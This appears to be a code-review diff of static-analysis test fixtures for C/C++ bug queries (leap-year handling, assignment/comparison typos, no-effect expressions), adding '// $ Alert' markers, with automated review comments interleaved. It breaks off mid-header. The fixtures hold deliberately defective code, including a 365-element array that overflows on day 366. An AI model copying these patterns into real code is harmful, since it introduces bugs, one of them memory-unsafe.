--- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp @@ -170,8 +170,8 @@ void antipattern2() qwLongTime += 365 * 24 * 60 * 60 * 10000000LLU; // copy back to a FILETIME - ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // BAD - ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // BAD + ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // BAD // $ Alert + ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // BAD // $ Alert // convert back to SYSTEMTIME for display or other usage FileTimeToSystemTime(&ft, &st); @@ -190,7 +190,7 @@ time_t mkTime(int days) tm.tm_hour = 0; tm.tm_mday = 0; tm.tm_mon = 0; - tm.tm_year = days / 365; // BAD + tm.tm_year = days / 365; // BAD // $ Alert // ... t = mktime(&tm); // convert tm -> time_t @@ -214,8 +214,8 @@ void checkedExample() qwLongTime += 365 * 24 * 60 * 60 * 10000000LLU; // copy back to a FILETIME - ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // GOOD [FALSE POSITIVE] - ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // GOOD [FALSE POSITIVE] + ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // GOOD [FALSE POSITIVE] // $ Alert + ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // GOOD [FALSE POSITIVE] // $ Alert // convert back to SYSTEMTIME for display or other usage if (FileTimeToSystemTime(&ft, &st) == 0) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref index 70eae8e7edc9..d453e0c83be4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref 
@@ -1 +1 @@ -Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql +query: Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref index 4271a41e0faa..e0d1519153c6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref @@ -1 +1,2 @@ -Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear.ql +query: Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp index 7f6f2cfd3fe7..f76167c1893b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp @@ -14,7 +14,7 @@ class vector { void ArrayOfDays_Bug(int dayOfYear, int x) { // BUG - int items[365]; + int items[365]; // $ Alert items[dayOfYear - 1] = x; } @@ -22,7 +22,7 @@ void ArrayOfDays_Bug(int dayOfYear, int x) void ArrayOfDays_Bug2(int dayOfYear, int x) { // BUG - int *items = new int[365]; + int *items = new int[365]; // $ Alert items[dayOfYear - 1] = x; delete items; @@ -49,7 +49,7 @@ void ArrayOfDays_FalsePositive(int dayOfYear, int x) void VectorOfDays_Bug(int dayOfYear, int x) { // BUG - vector items(365); + vector items(365); // $ Alert items[dayOfYear - 1] = x; } 
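Review bot: This `.qlref` is converted to the `query:` form but, unlike the other `.qlref` files in this part of the patch, gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line, so `// $ Alert` markers in this directory's sources would not be checked against this query. If the directory is shared with a second query (not visible here), that may be deliberate, and a sentence in the commit description would say so. Otherwise add the `postprocess:` line and tag the markers by query id, as CompareWhereAssignMeant/test.cpp does with `Alert[cpp/compare-where-assign-meant]`.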
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref index ca70196fa6b9..e4598d920438 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/AssignWhereCompareMeant.ql +query: Likely Bugs/Likely Typos/AssignWhereCompareMeant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp index 3cd181254673..c4dd2ff45101 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp @@ -24,25 +24,25 @@ class IntHolder { }; void f(int x) { - if (x = 3) { // BAD + if (x = 3) { // BAD // $ Alert } if ((x = 3)) { // GOOD: explicitly bracketed } - if (!(x = 3)) { // BAD + if (!(x = 3)) { // BAD // $ Alert } if (!((x = 3))) { // GOOD: explicitly bracketed } do { - } while (x = 0); // BAD + } while (x = 0); // BAD // $ Alert do { } while ((x = 0)); // GOOD: explicitly bracketed - if ((x = 3) && (x = 4)) { // BAD (x2) + if ((x = 3) && (x = 4)) { // BAD (x2) // $ Alert } if (((x = 3)) && ((x = 4))) { // GOOD: explicitly bracketed } - x = (x = 3) ? 2 : 1; // BAD + x = (x = 3) ? 2 : 1; // BAD // $ Alert x = ((x = 3)) ? 2 : 1; // GOOD: explicitly bracketed - assert(x = 2); // BAD + assert(x = 2); // BAD // $ Alert assert((x = 2)); // GOOD: explicitly bracketed int y; 
@@ -50,12 +50,12 @@ void f(int x) { if (y = 1) { // GOOD: y was not initialized so it is probably intentional. } y = 2; - if (y = 3) { // BAD: y has been initialized so it is probably a mistake. + if (y = 3) { // BAD: y has been initialized so it is probably a mistake. // $ Alert } int z = 1; - if (z = 2) { // BAD: z has been initialized so it is probably a mistake. + if (z = 2) { // BAD: z has been initialized so it is probably a mistake. // $ Alert } IntHolder holder1(x); IntHolder holder2(x); @@ -73,15 +73,15 @@ void g(int *i_p, int cond) { int i, j, k, x, y; static int s, t = 0; - if (global = 0) { // BAD: this is unlikely to be a deliberate initialization of global + if (global = 0) { // BAD: this is unlikely to be a deliberate initialization of global // $ Alert } - if (*i_p = 0) { // BAD + if (*i_p = 0) { // BAD // $ Alert } - if (s = 0) { // BAD + if (s = 0) { // BAD // $ Alert } - if (s = 0) { // BAD + if (s = 0) { // BAD // $ Alert } - if (t = 0) { // BAD + if (t = 0) { // BAD // $ Alert } for (i = 0, j = 0; i < 10; i++) { // GOOD @@ -89,7 +89,7 @@ void g(int *i_p, int cond) { } } - for (k = 0; !(k = 10); k++) { // BAD + for (k = 0; !(k = 10); k++) { // BAD // $ Alert } if (cond) { @@ -110,7 +110,7 @@ void h() { } int z = 0; - if(z = 1) { // BAD + if(z = 1) { // BAD // $ Alert } } 
@@ -131,26 +131,26 @@ void f3(int x, int y) { // as an assignment } - if((x == 1) && (y = 2)) { // BAD + if((x == 1) && (y = 2)) { // BAD // $ Alert } long z = x; - if(((z == 42) || (y = 2)) && (x == 1)) { // BAD + if(((z == 42) || (y = 2)) && (x == 1)) { // BAD // $ Alert } if((y = 2) && (x == z || x == 1)) { // GOOD } - if(((x == 42) || x == 1) && (y = 2)) { // BAD + if(((x == 42) || x == 1) && (y = 2)) { // BAD // $ Alert } if(x == 10 || (x == 42 && x == 1) && (y = 2)) { // GOOD } - if(x == 10 || ((x == 42) && (y = 2)) && (z == 1)) { // BAD + if(x == 10 || ((x == 42) && (y = 2)) && (z == 1)) { // BAD // $ Alert } - if((x == 10) || ((z == z) && (x == 1)) && (y = 2)) { // BAD + if((x == 10) || ((z == z) && (x == 1)) && (y = 2)) { // BAD // $ Alert } } @@ -163,11 +163,11 @@ void f4(int x, bool b) { if((x = 10) && use(x) && b) {} // GOOD: Same reason as above if((x = 10) && (use(x) && b)) {} // GOOD: Same reason as above - if(use(x) && b && (x = 10)) {} // BAD: The assignment is the last thing that happens in the comparison. + if(use(x) && b && (x = 10)) {} // BAD: The assignment is the last thing that happens in the comparison. // $ Alert // This doesn't match the usual pattern. - if((use(x) && b) && (x = 10)) {} // BAD: Same reason as above - if(use(x) && (b && (x = 10))) {} // BAD: Same reason as above + if((use(x) && b) && (x = 10)) {} // BAD: Same reason as above // $ Alert + if(use(x) && (b && (x = 10))) {} // BAD: Same reason as above // $ Alert - if((x = 10) || use(x)) {} // BAD: This doesn't follow the usual style of writing an assignment in + if((x = 10) || use(x)) {} // BAD: This doesn't follow the usual style of writing an assignment in // $ Alert // a boolean check. } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref index 54f62d41b7bb..c197f0008961 100644 
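Review bot: In the `@@ -163,11` hunk two markers are appended in the middle of a sentence that continues on the next line: `... writing an assignment in // $ Alert` is followed by `// a boolean check.`, and `... in the comparison. // $ Alert` is followed by `// This doesn't match the usual pattern.` The marker has to stay on the alert line, but the explanation reads better when it is complete before the marker, e.g. `if((x = 10) || use(x)) {} // BAD: unusual place for an assignment in a boolean check // $ Alert`. Removing the continuation lines would shift line numbers in the `.expected` file, so that part needs a regenerated baseline. `f4` begins before this hunk.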
--- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref
@@ -1 +1,2 @@
-Likely Bugs/Likely Typos/CompareWhereAssignMeant.ql
+query: Likely Bugs/Likely Typos/CompareWhereAssignMeant.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref
index 82a90f5413a9..662600c07dd1 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref
@@ -1 +1,2 @@
-Likely Bugs/Likely Typos/ExprHasNoEffect.ql
+query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp
index 2fa421059058..845acbb81927 100644
--- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp
@@ -25,30 +25,30 @@ void f(void) { i = 1; - i == 1; + i == 1; // $ Alert[cpp/compare-where-assign-meant] - i == 1, i == 2; + i == 1, i == 2; // $ Alert[cpp/compare-where-assign-meant] Alert[cpp/useless-expression] - i = i == 1, i == 2; + i = i == 1, i == 2; // $ Alert[cpp/compare-where-assign-meant] - i = (i == 1, i == 2); + i = (i == 1, i == 2); // $ Alert[cpp/compare-where-assign-meant] if (({ int x = 3; x == 3; })) { return; } - if (({ int x = 3; x == 3; x; })) { + if (({ int x = 3; x == 3; x; })) { // $ Alert[cpp/compare-where-assign-meant] return; } - if (({ int x = 3; x == 3; x = 4; })) { + if (({ int x = 3; x == 3; x = 4; })) { // $ Alert[cpp/compare-where-assign-meant] return; } - i != 1; + i != 1; // $ Alert[cpp/useless-expression] IntHolder holder1(i); IntHolder holder2(i); holder1 = holder2; - holder1 == holder2; + holder1 == holder2; // $ Alert[cpp/compare-where-assign-meant] if(holder1 = holder2) { } if(holder1 == holder1) { @@ -69,6 +69,6 @@ void report_error(const char*); void test_inside_macro_expansion(int x, int y) { DOES_NOT_THROW(x == y); // GOOD - x == y; // BAD - x == ID(y); // BAD + x == y; // BAD // $ Alert[cpp/compare-where-assign-meant] + x == ID(y); // BAD // $ Alert[cpp/compare-where-assign-meant] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp index 0c7f9edacd19..58a2680f3b94 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp @@ -10,7 +10,7 @@ struct person { bool hasName(person* p) { return p != NULL // This check is sensible, && p->name != NULL // as is this one. - && &p->name != NULL; // But this check is dubious. (BAD) + && &p->name != NULL; // But this check is dubious. (BAD) // $ Alert } // another example 
@@ -26,11 +26,11 @@ class myClass assert(this->y != NULL); assert(&this->y != NULL); // BAD [NOT DETECTED] assert(ptr->y != NULL); - assert(&ptr->y != NULL); // BAD + assert(&ptr->y != NULL); // BAD // $ Alert assert((ptr->y) != NULL); - assert(&(ptr->y) != NULL); // BAD + assert(&(ptr->y) != NULL); // BAD // $ Alert assert(ref.y != NULL); - assert(&(ref.y) != NULL); // BAD + assert(&(ref.y) != NULL); // BAD // $ Alert }; private: diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref index 4e0443db7906..da788f52f504 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/DubiousNullCheck.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/DubiousNullCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c index 4ff7c2253358..8f949d876dae 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c @@ -1,6 +1,6 @@ #include "conftest.h" int main3() { - strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. + strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. // $ Alert return 0; } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c index 88215d7434cd..102cfa4a8c22 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c @@ -1,6 +1,6 @@ #include "conftest.h" int main1() { - strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. + strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp index 2acdfcf80f8f..2de0aec1e365 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp @@ -5,11 +5,11 @@ int external(); class Base { public: virtual int thingy() { - 1; // BAD + 1; // BAD // $ Alert } int our_thingy() { - Base::thingy(); // BAD + Base::thingy(); // BAD // $ Alert return 2; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp index 56809a4e05fa..76a1669c3213 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp @@ -5,9 +5,9 @@ int i; void comma_expr_test() { i++, i++; // GOOD - 0, i++; // BAD (first part) - i++, 0; // BAD (second part) - 0, 0; // BAD (whole) + 0, i++; // BAD (first part) // $ Alert + i++, 0; // BAD (second part) // $ Alert + 0, 0; // BAD (whole) // $ Alert } } \ No newline at end of file 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c index 2761476c474e..063bdd743761 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c @@ -86,10 +86,10 @@ void test() fn1(); fn2(); fn3(); - fn4(); // has no effect + fn4(); // has no effect // $ Alert fn5(); fn6(); fn7(); fn8(); - fn9(); // has no effect + fn9(); // has no effect // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp index ecc3d6246034..e6d6e6362c19 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp @@ -16,7 +16,7 @@ void myTemplateTest() { Nothing n; i++; // GOOD (always has an effect) - n++; // BAD (never has an effect) + n++; // BAD (never has an effect) // $ Alert Increment(i); Increment(n); } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp index 7d2b6b19777e..12665301e6c6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp @@ -36,5 +36,5 @@ void call_add_numbers() int accum = 0; add_numbers(accum, 4); // GOOD add_numbers(accum, 10); // GOOD - pointless_add_numbers(accum, 20); // BAD + pointless_add_numbers(accum, 20); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c index 1b2530fdff5b..d7b65299dad3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c @@ -4,27 +4,27 @@ extern int g(void); void f(int b) { int i; - 0; + 0; // $ Alert - ({ 1; 2; 3; }); - i = ({ 4; 5; 6; }); - i = ({ 7; 8; 9, 10; }); + ({ 1; 2; 3; }); // $ Alert + i = ({ 4; 5; 6; }); // $ Alert + i = ({ 7; 8; 9, 10; }); // $ Alert - i = 11, 12; - i = 13, 14, 15; - i = (16, 17); - i = (18, 19, 20); - 21, 22; - 23, 24, 25; + i = 11, 12; // $ Alert + i = 13, 14, 15; // $ Alert + i = (16, 17); // $ Alert + i = (18, 19, 20); // $ Alert + 21, 22; // $ Alert + 23, 24, 25; // $ Alert i = b ? 26 : 27; i = b ? g() : 28; i = b ? 29 : g(); i = b ? g() : g(); - b ? 30 : 31; - b ? g() : 32; - b ? 33 : g(); + b ? 30 : 31; // $ Alert + b ? g() : 32; // $ Alert + b ? 33 : g(); // $ Alert b ? g() : g(); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp index da4398f4105b..f46ed1d6722f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp @@ -59,10 +59,10 @@ class MyAssignable : public Assignable void testFunc2() { Assignable u1, u2; - u2 = u1; + u2 = u1; // $ Alert MyAssignable v1, v2; - v2 = v1; + v2 = v1; // $ Alert } namespace std { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c index c34e0818f192..940d38a9511c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c @@ -6,18 +6,18 @@ char *pc; volatile char *pv; void f(void) { - c; // BAD + c; // BAD // $ Alert v; // (accesses to volatile variables are considered impure) - pc[5]; // BAD + pc[5]; // BAD // $ Alert pv[5]; ((volatile char *)pc)[5]; - *pc; // BAD + *pc; // BAD // $ Alert *pv; *((volatile char *)pc); - *(pc + 5); // BAD + *(pc + 5); // BAD // $ Alert *(pv + 5); *((volatile char *)(pc + 5)); *(((volatile char *)pc) + 5); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c index ef4bff229488..c76452eda93e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c @@ -15,6 +15,6 @@ int __attribute__((__weak__)) myWeakNothingFunction() } void testWeak() { - myNothingFunction(); // BAD + myNothingFunction(); // BAD // $ Alert myWeakNothingFunction(); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c index d2a13e17c837..8a9ce7696965 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c 
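Review bot: The markers added to `u2 = u1;` and `v2 = v1;` in `testFunc2` expect a no-effect alert on lines that read like ordinary assignments, and unlike the `// BAD` / `// GOOD` lines elsewhere in this patch they give no reason. If the reason is that the assignment operator of `Assignable` does nothing, say so on the line, e.g. `u2 = u1; // BAD: operator= has no effect // $ Alert`. If the alert is not intended, `// $ SPURIOUS: Alert` is the better marker. The class definitions are outside this hunk, so this cannot be confirmed from here.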
+++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c @@ -3,7 +3,7 @@ void C6317_positive(int i) { - if (i & !FLAGS) // BUG + if (i & !FLAGS) // BUG // $ Alert { } } @@ -28,9 +28,9 @@ void bitwiseAndUsage(unsigned int l, unsigned int r) unsigned int x; unsigned z = 0; - x = l & !r; //BUG - x = !FLAGS & r; //BUG - x = !FLAGS & !!r; //BUG + x = l & !r; //BUG // $ Alert + x = !FLAGS & r; //BUG // $ Alert + x = !FLAGS & !!r; //BUG // $ Alert x = !!l & r; // Not a bug - double negation x = !!!l & r; // Not a bug - double negation @@ -44,9 +44,9 @@ void bitwiseOrUsage(unsigned int l, unsigned int r) { unsigned int x; - x = l | !r; //BUG - x = !FLAGS | r; //BUG - x = !FLAGS | !!r; //BUG + x = l | !r; //BUG // $ Alert + x = !FLAGS | r; //BUG // $ Alert + x = !FLAGS | !!r; //BUG // $ Alert x = !!l | r; // Not a bug - double negation x = !!!l | r; // Not a bug - double negation @@ -67,7 +67,7 @@ void bitwiseOperatorsNotCovered(unsigned int l, unsigned int r) void macroUsage(unsigned int arg1, unsigned int arg2) { - if (((!cap_valid(arg1)) | arg2)) { // BUG + if (((!cap_valid(arg1)) | arg2)) { // BUG // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp index ac3f1ab3ed5c..68231c364ca7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp +++ 